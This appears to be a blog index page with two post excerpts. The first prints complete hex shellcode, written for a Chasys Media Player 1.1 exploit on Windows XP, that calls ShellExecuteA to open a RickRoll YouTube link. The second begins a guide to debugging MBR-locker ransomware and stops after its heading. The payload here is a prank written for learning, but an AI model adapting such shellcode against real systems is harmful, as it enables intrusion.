Writing a RickRoll shellcode

I was sitting in the lab the other day ~socializing~ with other students and we all agreed it was sad that there was no shellcode out there that would open a RickRoll. Making one seemed like a good way to procrastinate from preparing a talk on privacy while learning how to write shellcodes and the challenge was accepted. The application to have fun with was Chasys Media Player 1.1 on Windows XP SP3, no DEP or ASLR.

TL;DR:

\x89\xE5\x83\xEC\x7F\x83\xEC\x7F\x83\xEC\x06\x31\xC0\x88\x45\x84\x88\x45\x91\x88\x45\xB1\x88\x45\xBD\x88\x45\xCB\x88\x45\xD0\x88\x45\xFB\x89\xEB\x83\xEB\x4E\x53\xFF\x15\x7C\x90\x41\xFF\x89\xEB\x83\xEB\x42\x53\x50\xFF\x15\x24\x91\x41\xFF\x6A\x01\x31\xC9\x51\x51\x89\xEB\x83\xEB\x2F\x53\x89\xEB\x83\xEB\x34\x53\x31\xC9\x51\xFF\xD0\x31\xC9\x51\xFF\x15\xE4\x90\x41\xFF\x53\x68\x65\x6C\x6C\x33\x32\x2E\x64\x6C\x6C\x21\x53\x68\x65\x6C\x6C\x45\x78\x65\x63\x75\x74\x65\x41\x21\x6F\x70\x65\x6E\x21\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x79\x6F\x75\x74\x75\x62\x65\x2E\x63\x6F\x6D\x2F\x77\x61\x74\x63\x68\x3F\x76\x3D\x6F\x48\x67\x35\x53\x4A\x59\x52\x48\x41\x30\x21

Debugging MBRLockers on Windows

Ever met MBRLockers? Yes, those nasty pieces of malware which replace your Master Boot Record with malicious code and ransom you. Good news here, most of them just backup your original MBR somewhere and put one asking for ransom in its place. Today I’m going to tell you how to debug these things easily for ehmm, scientific purposes.

Simple MBR Locker

Simple MBR Locker